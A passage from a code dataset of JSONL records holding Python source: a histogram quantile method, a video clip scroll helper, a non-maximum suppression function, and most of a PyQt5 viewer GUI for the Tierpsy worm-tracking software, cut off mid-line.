0\n b = bp_ratio * (r0 - l0) + l0\n return b\n\n def sum(self):\n \"\"\"Return sum of points; O(max_bins) complexity.\"\"\"\n return sum(x * count for x, count in self._bins)\n\n def quantile(self, q):\n \"\"\"Return list of values at given quantile fraction(s); O(max_bins) complexity.\"\"\"\n # Deviation from Ben-Haim sum strategy:\n # * treat count 1 bins as \"exact\" rather than dividing the count at the point\n # * for neighboring exact bins, use simple linear interpolation matching\n # numpy.quantile()\n if isinstance(q, Number):\n q = (q, )\n bins = self._bins\n sums = [x - (y/2 if y > 1 else 0) for x, (_, y) in \\\n zip(accumulate(bin[1] for bin in bins), bins)]\n return list(self._quantile(sums, q_item) for q_item in q)\n"} {"ext": "py", "sha": "1a2fe743e17247433559d43f10d9b87dd9e11ea7", "content": "import numpy as np\n\ndef scroll(clip, h=None, w=None, x_speed=0, y_speed=0,\n x_start=0, y_start=0, apply_to=\"mask\"):\n \"\"\" Scrolls horizontally or vertically a clip, e.g. to make fin\n credits \"\"\"\n if h is None: h = clip.h\n if w is None: w = clip.w\n \n xmax = clip.w-w-1\n ymax = clip.h-h-1\n\n def f(gf,t):\n x = max(0, min(xmax, x_start+ np.round(x_speed*t)))\n y = max(0, min(ymax, y_start+ np.round(y_speed*t)))\n return gf(t)[y:y+h, x:x+w]\n \n return clip.fl(f, apply_to = apply_to)\n"} {"ext": "py", "sha": "1a2fe7ee1460e4c36f5e3ec530fe14354abcca3a", "content": "\"\"\"Non-Maximum Suppression module.\"\"\"\nimport numpy as np\nimport torch\n\n\ndef nms(detections, threshold):\n \"\"\"Apply Non-Maximum Suppression over the detections.\n The detections must be a tensor with two dimensions: (number of detections, 5).\n Why 5? Because a detection has x1, y1, x2, y2 and score.\n\n Heavily inspired by Adrian Rosebrock at:\n https://www.pyimagesearch.com/2015/02/16/faster-non-maximum-suppression-python/\n\n Why not the version of GPU? Because I couldn't make it work in my GPU.\n\n Args:\n detections (torch.Tensor): A tensor with all the detections. The shape must be\n (number of detections, 5) with the score as the last value of the second\n dimension.\n threshold (float): The threshold for the IoU (intersection over union) to take\n two detections as detecting the same object.\n\n Returns:\n torch.Tensor: A tensor with the indexes of the detections to keep.\n \"\"\"\n # If there aren't detections return empty\n if detections.shape[0] == 0:\n return torch.zeros((0))\n\n # Get the numpy version\n was_cuda = detections.is_cuda\n detections = detections.cpu().numpy()\n\n # Start the picked indexes list empty\n picked = []\n\n # Get the coordinates\n x1 = detections[:, 0]\n y1 = detections[:, 1]\n x2 = detections[:, 2]\n y2 = detections[:, 3]\n scores = detections[:, 4]\n\n # Compute the area of the bounding boxes\n areas = (x2 - x1 + 1) * (y2 - y1 + 1)\n\n # Get the indexes of the detections sorted by score\n indexes = np.argsort(scores)\n\n while len(indexes) > 0:\n # Take the last index (highest score) and add it to the picked\n last = len(indexes) - 1\n actual = indexes[last]\n picked.append(actual)\n\n # We need to find the overlap of the bounding boxes with the actual picked bounding box\n\n # Find the largest (more to the bottom-right) (x,y) coordinates for the start\n # (top-left) of the bounding box\n xx1 = np.maximum(x1[actual], x1[indexes[:last]])\n yy1 = np.maximum(y1[actual], y1[indexes[:last]])\n # Find the smallest (more to the top-left) (x,y) coordinates for the end (bottom-right)\n # of the bounding box\n xx2 = np.minimum(x2[actual], x2[indexes[:last]])\n yy2 = np.minimum(y2[actual], y2[indexes[:last]])\n\n # Compute width and height to compute the intersection over union\n w = np.maximum(0, xx2 - xx1 + 1)\n h = np.maximum(0, yy2 - yy1 + 1)\n intersection = (w * h)\n union = areas[actual] + areas[indexes[:last]] - intersection\n iou = intersection / union\n \n # Delete the last index and all that overlap is bigger than threshold\n indexes = np.delete(indexes, np.concatenate(([last], np.where(iou > threshold)[0])))\n\n # Return the picked indexes\n picked = torch.Tensor(picked).long()\n if was_cuda:\n picked = picked.cuda()\n\n return picked\n"} {"ext": "py", "sha": "1a2fe94d05b3883bd5969cc6fc5bcb6944bdaec8", "content": "import os\nfrom functools import partial\nimport numpy as np\nimport pandas as pd\nimport tables\nimport matplotlib\nimport warnings\n\nfrom PyQt5.QtCore import Qt, QPointF\nfrom PyQt5.QtGui import QPixmap, QPainter, QFont, QPen, QPolygonF, QColor, QKeySequence, QBrush\nfrom PyQt5.QtWidgets import QApplication, QMessageBox\n\nfrom tierpsy.analysis.ske_create.helperIterROI import getWormROI\nfrom tierpsy.analysis.split_fov.FOVMultiWellsSplitter import FOVMultiWellsSplitter\n\nfrom tierpsy.gui.MWTrackerViewer_ui import Ui_MWTrackerViewer\nfrom tierpsy.gui.TrackerViewerAux import TrackerViewerAuxGUI\nfrom tierpsy.gui.PlotFeatures import PlotFeatures\n\nfrom tierpsy.helper.misc import WLAB, save_modified_table\nfrom tierpsy.analysis.split_fov.helper import get_well_color\n\n\nclass WellsDrawer(TrackerViewerAuxGUI):\n '''\n Dummy class with the wells division drawer functions\n '''\n def __init__(self, ui):\n super().__init__(ui)\n # colour\n self.fovsplitter_mask = None\n self.fovsplitter_feat = None\n self.fovsplitter = None\n self.is_fov_tosplit = None\n\n\n def updateVideoFile(self, vfilename):\n super().updateVideoFile(vfilename)\n # check if /fov_wells exists in masked video\n if self.fid is not None:\n if '/fov_wells' not in self.fid:\n self.is_fov_tosplit = False\n else:\n self.is_fov_tosplit = True\n # if it exists, read it\n if self.is_fov_tosplit:\n# self.wells_in_mask = pd.DataFrame(\n# self.fid.get_node('/fov_wells').read())\n self.fovsplitter_mask = FOVMultiWellsSplitter(self.vfilename)\n\n def updateSkelFile(self, skeletons_file):\n super().updateSkelFile(skeletons_file)\n # if no skeletons, skip\n if not self.skeletons_file:\n return\n # check if /fov_wells exists in features video\n with tables.File(self.skeletons_file, 'r') as fid:\n if '/fov_wells' not in fid:\n self.is_fov_tosplit = False\n# print(\"didn't find fov wells though\")\n else:\n self.is_fov_tosplit = True\n# print(\"found fov wells in featuresN\")\n # if it exists, read it\n if self.is_fov_tosplit:\n# print('reading fov_wells from featuresN')\n# print('pre-reading:')\n# print(self.wells)\n# self.wells_in_feat = pd.DataFrame(\n# fid.get_node('/fov_wells').read())\n self.fovsplitter_feat = FOVMultiWellsSplitter(self.skeletons_file)\n\n\n def draw_wells(self, image):\n '''\n Draw wells.\n '''\n if self.is_fov_tosplit:\n if self.fovsplitter_feat is not None:\n self.fovsplitter = self.fovsplitter_feat\n else: # fall back to mask ones\n print('falling back')\n self.fovsplitter = self.fovsplitter_mask\n\n # prepare constants for drawing\n self.fontsize = max(1, max(image.height(), image.width()) // 60)\n penwidth = max(1, max(image.height(), image.width()) // 400)\n self.penwidth = penwidth if penwidth % 2 == 1 else penwidth + 1\n# self.wellsC = QColor(250, 140, 0)\n if 'is_good_well' in self.fovsplitter.wells.columns:\n is_color_by_well = True\n else:\n is_color_by_well = False\n # Qt drawing code\n painter = QPainter()\n painter.begin(image)\n pen = QPen()\n pen.setWidth(self.penwidth)\n painter.setFont(QFont('Decorative', self.fontsize))\n # loop on wells\n for _, well in self.fovsplitter.wells.iterrows():\n # update color every time\n if is_color_by_well:\n wellC = get_well_color(well['is_good_well'], forCV=True)\n wellC = QColor(*wellC)\n else:\n wellC = QColor(250, 140, 0)\n pen.setColor(wellC)\n painter.setPen(pen)\n # draw well name\n painter.drawText(well['x_min'] + self.fontsize*0.4,\n well['y_min'] + self.fontsize*1.2,\n well['well_name'])\n # draw rectangle\n painter.drawRect(well['x_min'],\n well['y_min'],\n well['x_max'] - well['x_min'],\n well['y_max'] - well['y_min'])\n if well['is_good_well'] == False:\n painter.drawLine(well['x_min'],\n well['y_min'],\n well['x_max'],\n well['y_max'])\n painter.end()\n\n\n\n\n# super().keyPressEvent(event)\n\n\nclass ContourDrawer(TrackerViewerAuxGUI):\n '''\n Dummy class with the contour functions\n '''\n def __init__(self, ui):\n super().__init__(ui)\n\n self.food_coordinates = None\n self.wlabC = {\n WLAB['U']: Qt.white,\n WLAB['WORM']: Qt.green,\n WLAB['WORMS']: Qt.blue,\n WLAB['BAD']: Qt.darkRed,\n WLAB['GOOD_SKE']: Qt.darkCyan\n }\n self.ui.checkBox_showFood.stateChanged.connect(self.updateImage)\n self.ui.checkBox_showFood.setEnabled(False)\n self.ui.checkBox_showFood.setChecked(True)\n\n def updateSkelFile(self, skeletons_file):\n\n super().updateSkelFile(skeletons_file)\n if not self.skeletons_file or self.trajectories_data is None:\n self.food_coordinates = None\n return\n\n with tables.File(self.skeletons_file, 'r') as fid:\n if not '/food_cnt_coord' in fid:\n self.food_coordinates = None\n self.ui.checkBox_showFood.setEnabled(False)\n else:\n #change from microns to pixels\n self.food_coordinates = fid.get_node('/food_cnt_coord')[:]\n self.food_coordinates /= self.microns_per_pixel\n\n self.ui.checkBox_showFood.setEnabled(True)\n\n def draw_food_contour(self, image):\n if self.food_coordinates is None or not self.ui.checkBox_showFood.isChecked():\n return\n\n painter = QPainter()\n painter.begin(image)\n\n penwidth = max(1, max(image.height(), image.width()) // 800)\n col = Qt.darkMagenta\n p = QPolygonF()\n for x,y in self.food_coordinates:\n p.append(QPointF(x,y))\n\n pen = QPen()\n pen.setWidth(penwidth)\n pen.setColor(col)\n painter.setPen(pen)\n\n painter.drawPolyline(p)\n painter.end()\n\nclass IntensityLabeler(TrackerViewerAuxGUI):\n def __init__(self, ui):\n super().__init__(ui)\n\n self.mean_intensity = None\n self.ui.intensity_label.setStyleSheet('') #avoid displaying color at the start of the programı\n\n def updateVideoFile(self, vfilename):\n super().updateVideoFile(vfilename)\n if self.fid is not None:\n #get mean intensity information.\n #Useful for the optogenetic experiments.\n try:\n mean_int = self.fid.get_node('/mean_intensity')[:]\n\n #calculate the intensity range and normalize the data.\n #I am ignoring any value less than 1. The viewer only works with uint8 data.\n\n dd = mean_int[mean_int>=1]\n if dd.size == 0:\n raise ValueError\n\n bot = np.min(dd)\n top = np.max(dd)\n rr = top-bot\n\n # if the mean value change is less than 1 (likely continous image do nothing)\n if rr <= 1:\n raise ValueError\n\n self.mean_intensity = (mean_int-bot)/(rr)\n\n except (tables.exceptions.NoSuchNodeError, ValueError):\n self.mean_intensity = None\n self.ui.intensity_label.setStyleSheet('')\n\n def display_intensity(self):\n if self.mean_intensity is not None and self.frame_number < self.mean_intensity.size:\n d = int(self.mean_intensity[self.frame_number]*255)\n self.ui.intensity_label.setStyleSheet('QLabel {background-color: rgb(%i, %i, %i);}' % (0, 0, d))\n\nclass BlobLabeler(TrackerViewerAuxGUI):\n def __init__(self, ui):\n super().__init__(ui)\n self.wlab = WLAB\n self.label_type = 'worm_label'\n\n self.ui.pushButton_U.clicked.connect(\n partial(self._h_tag_worm, self.wlab['U']))\n self.ui.pushButton_W.clicked.connect(\n partial(self._h_tag_worm, self.wlab['WORM']))\n self.ui.pushButton_WS.clicked.connect(\n partial(self._h_tag_worm, self.wlab['WORMS']))\n self.ui.pushButton_B.clicked.connect(\n partial(self._h_tag_worm, self.wlab['BAD']))\n\n self.ui.pushButton_W.setShortcut(QKeySequence(Qt.Key_W))\n self.ui.pushButton_U.setShortcut(QKeySequence(Qt.Key_U))\n self.ui.pushButton_WS.setShortcut(QKeySequence(Qt.Key_C))\n self.ui.pushButton_B.setShortcut(QKeySequence(Qt.Key_B))\n\n\n def enable_label_buttons(self, value):\n self.ui.pushButton_U.setEnabled(value)\n self.ui.pushButton_W.setEnabled(value)\n self.ui.pushButton_WS.setEnabled(value)\n self.ui.pushButton_B.setEnabled(value)\n\n\n def _h_tag_worm(self, label_ind):\n if not self.worm_index_type == 'worm_index_manual':\n return\n\n worm_ind = self.current_worm_index\n\n if self.frame_data is None:\n return\n\n if not worm_ind in self.frame_data['worm_index_manual'].values:\n QMessageBox.critical(\n self,\n 'The selected worm is not in this frame.',\n 'Select a worm in the current frame to label.',\n QMessageBox.Ok)\n return\n\n good = self.trajectories_data['worm_index_manual'] == worm_ind\n self.trajectories_data.loc[good, 'worm_label'] = label_ind\n self.updateImage()\n\n\nclass ROIWorm():\n def __init__(self, wormCanvas, comboBox_ROI, checkBox_ROI):\n self.worm_index = None\n self.wormCanvas = wormCanvas\n self.comboBox_ROI = comboBox_ROI\n self.checkBox_ROI = checkBox_ROI\n\n self.comboBox_ROI.activated.connect(self.selectROI)\n\n def selectROI(self, index):\n try:\n self.worm_index = int(self.comboBox_ROI.itemText(index))\n except ValueError:\n self.worm_index = None\n\n @property\n def isDrawSkel(self):\n return self.checkBox_ROI.isChecked()\n\n\nclass ROIManager(TrackerViewerAuxGUI):\n def __init__(self, ui):\n\n super().__init__(ui)\n self.rois = [\n ROIWorm(\n self.ui.wormCanvas1,\n self.ui.comboBox_ROI1,\n self.ui.checkBox_ROI1\n ),\n ROIWorm(\n self.ui.wormCanvas2,\n self.ui.comboBox_ROI2,\n self.ui.checkBox_ROI2\n )\n ]\n\n\n self.ui.radioButton_ROI1.setShortcut(QKeySequence(Qt.Key_Up))\n self.ui.radioButton_ROI2.setShortcut(QKeySequence(Qt.Key_Down))\n\n\n self.ui.checkBox_ROI1.stateChanged.connect(partial(self._updateROI, self.rois[0]))\n self.ui.checkBox_ROI2.stateChanged.connect(partial(self._updateROI, self.rois[1]))\n\n self.ui.comboBox_ROI1.activated.connect(partial(self._updateROI, self.rois[0]))\n self.ui.comboBox_ROI2.activated.connect(partial(self._updateROI, self.rois[1]))\n\n # flags for RW and FF\n self.RW, self.FF = 1, 2\n self.ui.pushButton_ROI1_RW.clicked.connect(partial(self.roiRWFF, self.RW, self.rois[0]))\n self.ui.pushButton_ROI1_FF.clicked.connect(partial(self.roiRWFF, self.FF, self.rois[0]))\n self.ui.pushButton_ROI2_RW.clicked.connect(partial(self.roiRWFF, self.RW, self.rois[1]))\n self.ui.pushButton_ROI2_FF.clicked.connect(partial(self.roiRWFF, self.FF, self.rois[1]))\n\n @property\n def current_roi(self):\n if self.ui.radioButton_ROI1.isChecked():\n return self.rois[0]\n elif self.ui.radioButton_ROI2.isChecked():\n return self.rois[1]\n else:\n raise ValueError(\"I shouldn't be here\")\n\n @property\n def current_worm_index(self):\n return self.current_roi.worm_index\n\n def updateSkelFile(self, skeletons_file):\n for roi in self.rois:\n roi.worm_index = None\n super().updateSkelFile(skeletons_file)\n\n def keyPressEvent(self, event):\n #MORE SHORTCUTS\n # go the the start of end of a trajectory\n if event.key() == Qt.Key_BracketLeft:\n\n self.roiRWFF(self.RW, self.current_roi)\n\n elif event.key() == Qt.Key_BracketRight:\n\n self.roiRWFF(self.FF, self.current_roi)\n\n super().keyPressEvent(event)\n\n\n def updateROIcomboBox(self, roi):\n # update valid index for the comboBox\n roi.comboBox_ROI.clear()\n\n if roi.worm_index is not None:\n roi.comboBox_ROI.addItem(str(int(roi.worm_index)))\n\n\n for ind in self.frame_data[self.worm_index_type]:\n roi.comboBox_ROI.addItem(str(int(ind)))\n\n if roi.worm_index is None:\n w_ind = float(roi.comboBox_ROI.itemText(0))\n roi.worm_index = int(w_ind)\n\n # function that generalized the updating of the ROI\n def _updateROI(self, roi):\n\n if self.frame_data is None or not self.worm_index_type:\n # no trajectories data presented, nothing to do here\n roi.wormCanvas.clear()\n return\n\n self.updateROIcomboBox(roi)\n\n # extract individual worm ROI\n good = self.frame_data[self.worm_index_type] == roi.worm_index\n row_data = self.frame_data.loc[good].squeeze()\n\n if row_data.size == 0 or \\\n np.isnan(row_data['coord_x']) or \\\n np.isnan(row_data['coord_y']):\n # invalid data nothing to do here\n roi.wormCanvas.clear()\n return\n\n worm_img, roi_corner = getWormROI(self.frame_img,\n row_data['coord_x'],\n row_data['coord_y'],\n row_data['roi_size']\n )\n\n roi_ori_size = worm_img.shape\n worm_img = np.ascontiguousarray(worm_img)\n worm_qimg = self._convert2Qimg(worm_img)\n\n canvas_size = min(roi.wormCanvas.height(), roi.wormCanvas.width())\n worm_qimg = worm_qimg.scaled(\n canvas_size, canvas_size, Qt.KeepAspectRatio)\n\n worm_qimg = self.drawSkelResult(worm_img, worm_qimg, row_data, roi.isDrawSkel, roi_corner, read_center=False)\n\n pixmap = QPixmap.fromImage(worm_qimg)\n roi.wormCanvas.setPixmap(pixmap)\n\n def updateROIs(self):\n for roi in self.rois:\n self._updateROI(roi)\n\n def clearROIs(self):\n for roi in self.rois:\n roi.wormCanvas.clear()\n\n # move to the first or the last frames of a trajectory\n def roiRWFF(self, rwff, roi):\n\n if self.frame_data is None:\n return\n\n # use 1 for rewind RW or 2 of fast forward\n good = self.trajectories_data[self.worm_index_type] == roi.worm_index\n frames = self.trajectories_data.loc[good, 'frame_number']\n\n if frames.size == 0:\n return\n\n if rwff == self.RW:\n self.frame_number = frames.min()\n elif rwff == self.FF:\n self.frame_number = frames.max()\n else:\n raise ValueError('Invalid rwff value : {} '.format(rwff))\n\n self.ui.spinBox_frame.setValue(self.frame_number)\n\nclass TrajectoryEditor(ROIManager):\n def __init__(self, ui):\n super().__init__(ui)\n self.ui.pushButton_join.clicked.connect(self.joinTraj)\n self.ui.pushButton_split.clicked.connect(self.splitTraj)\n\n #SHORTCUTS\n self.ui.pushButton_join.setShortcut(QKeySequence(Qt.Key_J))\n self.ui.pushButton_split.setShortcut(QKeySequence(Qt.Key_S))\n\n def enable_trajectories_buttons(self, value):\n self.ui.pushButton_join.setEnabled(value)\n self.ui.pushButton_split.setEnabled(value)\n\n def joinTraj(self):\n if self.worm_index_type != 'worm_index_manual' \\\n or self.frame_data is None:\n return\n\n worm_ind1 = self.rois[0].worm_index\n worm_ind2 = self.rois[1].worm_index\n\n if worm_ind1 == worm_ind2:\n QMessageBox.critical(\n self,\n 'Cannot join the same trajectory with itself',\n 'Cannot join the same trajectory with itself.',\n QMessageBox.Ok)\n return\n\n index1 = (self.trajectories_data[\n 'worm_index_manual'] == worm_ind1).values\n index2 = (self.trajectories_data[\n 'worm_index_manual'] == worm_ind2).values\n\n # if the trajectories do not overlap they shouldn't have frame_number\n # indexes in commun\n frame_number = self.trajectories_data.loc[\n index1 | index2, 'frame_number']\n\n if frame_number.size != np.unique(frame_number).size:\n QMessageBox.critical(\n self,\n 'Cannot join overlaping trajectories',\n 'Cannot join overlaping trajectories.',\n QMessageBox.Ok)\n return\n\n if not (worm_ind1 in self.frame_data[\n 'worm_index_manual'].values or worm_ind2 in self.frame_data['worm_index_manual'].values):\n reply = QMessageBox.question(\n self,\n 'Message',\n \"The none of the selected worms to join is not in this frame. Are you sure to continue?\",\n QMessageBox.Yes | QMessageBox.No,\n QMessageBox.No)\n\n if reply == QMessageBox.No:\n return\n\n # get the first row for each segment to extract some data\n first_row1 = self.trajectories_data.loc[index1, :].iloc[0]\n first_row2 = self.trajectories_data.loc[index2, :].iloc[0]\n\n # join trajectories\n self.trajectories_data.loc[\n index2, 'worm_label'] = first_row1['worm_label']\n self.trajectories_data.loc[index2, 'worm_index_manual'] = worm_ind1\n\n self.rois[0].worm_index = worm_ind1\n self.rois[1].worm_index = worm_ind1\n\n #this might be too slow. I might need to change it\n self.traj_worm_index_grouped = self.trajectories_data.groupby(self.worm_index_type)\n\n self.updateImage()\n\n\n def splitTraj(self):\n if self.worm_index_type != 'worm_index_manual' \\\n or self.frame_data is None:\n return\n\n worm_ind = self.current_worm_index\n\n if not worm_ind in self.frame_data['worm_index_manual'].data:\n QMessageBox.critical(\n self,\n 'Worm index is not in the current frame.',\n 'Worm index is not in the current frame. Select a valid index.',\n QMessageBox.Ok)\n return\n\n last_index = self.trajectories_data['worm_index_manual'].max()\n\n new_ind1 = last_index + 1\n new_ind2 = last_index + 2\n\n good = self.trajectories_data['worm_index_manual'] == worm_ind\n frames = self.trajectories_data.loc[good, 'frame_number']\n frames = frames.sort_values(inplace=False)\n\n good = frames < self.frame_number\n index1 = frames[good].index\n index2 = frames[~good].index\n self.trajectories_data.ix[index1, 'worm_index_manual'] = new_ind1\n self.trajectories_data.ix[index2, 'worm_index_manual'] = new_ind2\n\n self.rois[0].index = new_ind1\n self.rois[1].index = new_ind2\n\n #this might be too slow. I might need to change it\n self.traj_worm_index_grouped = self.trajectories_data.groupby(self.worm_index_type)\n\n self.updateImage()\n\nclass FeatureReaderBase(TrackerViewerAuxGUI):\n index_cols = ['worm_index', 'timestamp', 'motion_modes', 'skeleton_id', 'well_name']\n valid_fields = ['/timeseries_data', '/features_timeseries']\n\n def __init__(self, ui):\n self.timeseries_data = None\n self.feat_column = ''\n\n super().__init__(ui)\n\n def updateSkelFile(self, skeletons_file):\n super().updateSkelFile(skeletons_file)\n try:\n self.traj_colors = {}\n with pd.HDFStore(self.skeletons_file, 'r') as ske_file_id:\n for field in self.valid_fields:\n if field in ske_file_id:\n self.timeseries_data = ske_file_id[field]\n\n if field == '/timeseries_data':\n blob_features = ske_file_id['/blob_features']\n blob_features.columns = ['blob_' + x for x in blob_features.columns]\n self.timeseries_data = pd.concat((self.timeseries_data, blob_features), axis=1)\n break\n else:\n raise KeyError\n\n if not len(self.timeseries_data) != len(self.trajectories_data):\n ValueError('timeseries_data and trajectories_data does not match. You might be using an old version of featuresN.hdf5')\n\n\n self.valid_features = [x for x in self.timeseries_data.columns if x not in self.index_cols]\n\n\n except (TypeError, AttributeError, IOError, KeyError, tables.exceptions.HDF5ExtError):\n self.valid_features = None\n self.timeseries_data = None\n\nclass MarkersDrawer(FeatureReaderBase):\n def __init__(self, ui):\n super().__init__(ui)\n\n self.traj_colors = {}\n self.n_points_traj = 250\n self.n_colors = 256\n cmap = matplotlib.cm.get_cmap(\"bwr\")\n palette = [cmap(x) for x in np.linspace(0, 1, self.n_colors)]\n #palette = sns.color_palette(\"RdBu_r\", self.n_colors)\n palette = np.round(np.array(palette)*255).astype(np.int)\n self.palette = [QColor(*x) for x in palette]\n\n\n self.drawT = {x: self.ui.comboBox_drawType.findText(x , flags=Qt.MatchContains)\n for x in ['boxes', 'traj']}\n\n self.showT = {x: self.ui.comboBox_showLabels.findText(x , flags=Qt.MatchContains)\n for x in ['hide', 'all', 'filter']}\n\n self.ui.comboBox_showLabels.setCurrentIndex(self.showT['all'])\n\n self.ui.comboBox_showLabels.currentIndexChanged.connect(self.updateImage)\n self.ui.comboBox_drawType.currentIndexChanged.connect(self.updateImage)\n\n self.ui.feature_column.currentIndexChanged.connect(self.change_feature)\n\n\n self.ui.feat_max_value.valueChanged.connect(self.updateImage)\n self.ui.feat_min_value.valueChanged.connect(self.updateImage)\n self.ui.is_color_features.stateChanged.connect(self.updateImage)\n\n self.enable_color_feats(False)\n\n\n self.ui.spinBox_step.valueChanged.connect(self.updateImage)\n\n def updateSkelFile(self, skeletons_file):\n self.ui.is_color_features.setChecked(False)\n\n super().updateSkelFile(skeletons_file)\n\n self.ui.feature_column.clear()\n if self.timeseries_data is None:\n #no feature data\n self.enable_color_feats(False)\n else:\n self.enable_color_feats(True)\n self.ui.feature_column.addItems(self.valid_features)\n self._h_find_feat_limits()\n\n def change_feature(self):\n self._h_find_feat_limits()\n self.updateImage()\n\n def _h_find_feat_limits(self):\n self.feat_column = str(self.ui.feature_column.currentText())\n print(self.feat_column)\n\n if self.feat_column and self.timeseries_data is not None:\n f_max = self.timeseries_data[self.feat_column].max()\n f_min = self.timeseries_data[self.feat_column].min()\n q1, q2 = self.timeseries_data[self.feat_column].quantile([0.02, 0.98])\n\n else:\n f_min, f_max, q1, q2 = 0,0,0,0\n\n self.ui.feat_max_value.setRange(f_min, f_max)\n self.ui.feat_min_value.setRange(f_min, f_max)\n self.ui.feat_min_value.setValue(q1)\n self.ui.feat_max_value.setValue(q2)\n\n\n def enable_color_feats(self, value):\n self.ui.feature_column.setEnabled(value)\n self.ui.feat_min_value.setEnabled(value)\n self.ui.feat_max_value.setEnabled(value)\n self.ui.is_color_features.setEnabled(value)\n\n\n def _h_assign_feat_color(self, irow):\n\n feat_val = self.timeseries_data.loc[irow, self.feat_column]\n\n if (feat_val != feat_val):\n return Qt.black\n\n #this function can and should be optimized\n f_min = self.ui.feat_min_value.value()\n f_max = self.ui.feat_max_value.value()\n\n if f_min == f_max: #dummy range in case all the values are the same\n f_min, f_max = -1, 1\n elif f_min > f_max:\n return Qt.black\n\n nn = np.clip((feat_val - f_min)/(f_max - f_min), 0, 1)\n ind = int(np.round(nn*(self.n_colors-1)))\n\n col = self.palette[ind]\n return col\n\n\n def draw_worm_markers(self, image):\n '''\n Draw traj worm trajectory.\n '''\n if not self.worm_index_type in self.frame_data or \\\n self.ui.comboBox_showLabels.currentIndex() == self.showT['hide']:\n return\n\n if hasattr(self, 'current_worm_index'):\n current_index = self.current_worm_index\n else:\n current_index = -1\n\n painter = QPainter()\n painter.begin(image)\n\n self.fontsize = max(1, max(image.height(), image.width()) // 120)\n\n penwidth = max(1, max(image.height(), image.width()) // 800)\n self.penwidth = penwidth if penwidth % 2 == 1 else penwidth + 1\n\n if not self.label_type in self.frame_data:\n self.frame_data[self.label_type] = self.wlab['U']\n\n for row_id, row_data in self.frame_data.iterrows():\n # check if the coordinates are nan\n if np.isnan(row_data['coord_x']) or np.isnan(row_data['coord_y']):\n continue\n\n #if select between showing filtered index or not\n if self.ui.comboBox_showLabels.currentIndex() == self.showT['filter']:\n continue\n\n is_current_index = current_index == int(row_data[self.worm_index_type])\n\n cb_ind = self.ui.comboBox_drawType.currentIndex()\n if cb_ind == self.drawT['boxes']:\n self.draw_boxes(painter, row_id, row_data, is_current_index)\n elif cb_ind == self.drawT['traj']:\n self.draw_trajectories(painter, row_data, is_current_index)\n\n\n painter.end()\n\n def _h_get_trajectory(self, worm_index, current_frame):\n worm_data = self.traj_worm_index_grouped.get_group(worm_index)\n valid_index = worm_data.index[worm_data['frame_number']<= current_frame]\n\n ini = max(0, valid_index.size - self.frame_step*self.n_points_traj)\n traj_ind = valid_index.values[ini::self.frame_step]\n traj_data = worm_data.loc[traj_ind]\n return traj_data\n\n\n def draw_trajectories(self, painter, row_data, is_current_index):\n if self.traj_worm_index_grouped is None:\n return\n worm_index = int(row_data[self.worm_index_type])\n current_frame = row_data['frame_number']\n traj_data = self._h_get_trajectory(worm_index, current_frame)\n traj_data = traj_data.dropna(subset=['coord_x', 'coord_y'])\n\n x_v = traj_data['coord_x'].round()\n y_v = traj_data['coord_y'].round()\n points = [QPointF(*map(int, c)) for c in zip(x_v, y_v)]\n\n if self.ui.is_color_features.isChecked():\n\n vec_color = [self._h_assign_feat_color(x) for x in traj_data.index]\n\n pen = QPen()\n pen.setWidth(self.penwidth)\n for p1, p2, c in zip(points[1:], points[:-1], vec_color):\n pen.setColor(c)\n painter.setPen(pen)\n painter.drawLine(p1, p2)\n else:\n pol = QPolygonF()\n for p in points:\n pol.append(p)\n\n if not worm_index in self.traj_colors:\n self.traj_colors[worm_index] = QColor(*np.random.randint(50, 230, 3))\n col = self.traj_colors[worm_index]\n\n pen = QPen()\n pen.setWidth(self.penwidth)\n pen.setColor(col)\n painter.setPen(pen)\n painter.drawPolyline(pol)\n\n def draw_boxes(self, painter, row_id, row_data, is_current_index):\n '''\n Draw traj worm trajectory.\n '''\n worm_index = int(row_data[self.worm_index_type])\n x = int(round(row_data['coord_x']))\n y = int(round(row_data['coord_y']))\n\n label_color = self.wlabC[int(row_data[self.label_type])]\n if not self.ui.is_color_features.isChecked():\n label_color = self.wlabC[int(row_data[self.label_type])]\n else:\n label_color = self._h_assign_feat_color(row_id)\n\n\n pen = QPen()\n pen.setColor(label_color)\n pen.setWidth(self.penwidth)\n painter.setPen(pen)\n painter.setFont(QFont('Decorative', self.fontsize))\n\n painter.drawText(x, y, str(worm_index))\n\n bb = row_data['roi_size']\n painter.drawRect(x - bb / 2, y - bb / 2, bb, bb)\n\n if is_current_index:\n\n b_size = bb//5\n offset = bb/2 - b_size\n painter.fillRect(x + offset, y + offset, b_size, b_size, QBrush(label_color))\n\n\nclass PlotCommunicator(FeatureReaderBase, ROIManager):\n def __init__(self, ui=''):\n super().__init__(ui)\n self.ui.pushButton_plot.setEnabled(False)\n self.ui.pushButton_plot.clicked.connect(self.show_plot)\n self.plotter = None\n\n def closePrev(self):\n if self.plotter is not None:\n self.plotter.close()\n self.plotter = None\n\n def updateSkelFile(self, skeletons_file):\n super().updateSkelFile(skeletons_file)\n self.closePrev()\n if self.timeseries_data is None:\n self.ui.pushButton_plot.setEnabled(False)\n else:\n self.ui.pushButton_plot.setEnabled(True)\n\n def show_plot(self):\n self.closePrev()\n\n self.plotter = PlotFeatures(self.skeletons_file,\n self.timeseries_data,\n self.traj_worm_index_grouped,\n self.time_units,\n self.xy_units,\n self.fps,\n parent = self)\n\n self.plotter.setWindowFlags(self.plotter.windowFlags() | Qt.WindowStaysOnTopHint)\n\n self.plotter.show()\n self.update_plot()\n\n def update_plot(self):\n if self.plotter:\n self.plotter.plot(self.current_worm_index, self.feat_column)\n\nclass MWTrackerViewer_GUI( MarkersDrawer, PlotCommunicator,\n ContourDrawer, BlobLabeler, IntensityLabeler, TrajectoryEditor, WellsDrawer):\n\n def __init__(self, ui='', argv=''):\n if not ui:\n super().__init__(Ui_MWTrackerViewer())\n else:\n super().__init__(ui)\n\n self.setWindowTitle(\"Multi-Worm Viewer\")\n\n self.vfilename = '' if len(argv) <= 1 else argv[1]\n self.videos_dir = r\"/Volumes/behavgenom$/GeckoVideo/MaskedVideos/\"\n self.results_dir = ''\n self.skeletons_file = ''\n self.worm_index_type = 'worm_index_manual'\n self.frame_data = None\n\n\n self.ui.comboBox_labelType.currentIndexChanged.connect(self.selectWormIndexType)\n\n self.ui.pushButton_save.clicked.connect(self.saveData)\n\n # select worm ROI when doubleclick a worm\n self.mainImage._canvas.mouseDoubleClickEvent = self.selectWorm\n self.mainImage._canvas.mouseRightClickEvent = self.toggleWellStatus\n\n self.ui.comboBox_ROI1.activated.connect(self.update_plot)\n self.ui.comboBox_ROI2.activated.connect(self.update_plot)\n\n def saveData(self):\n '''save data from manual labelling. pytables saving format is more convenient than pandas'''\n\n if os.name == 